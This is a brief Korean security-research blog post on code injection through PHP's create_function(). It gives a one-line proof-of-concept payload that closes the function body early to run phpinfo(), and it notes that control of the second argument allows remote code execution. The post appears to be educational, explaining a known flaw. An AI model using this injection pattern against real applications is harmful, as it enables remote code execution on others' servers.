Safflower's Blog Security Researcher

PHP의 create_function() 함수 취약점

PHP

<?php
    create_function('', 'return -1;} phpinfo(); /*');
?>

PHP의 create_function() 함수는 2번째 인자에 들어가는 값을 조작할 수 있을때 RCE 공격이 가능하다.

https://3v4l.org/oUOSb


Similar Posts

Comments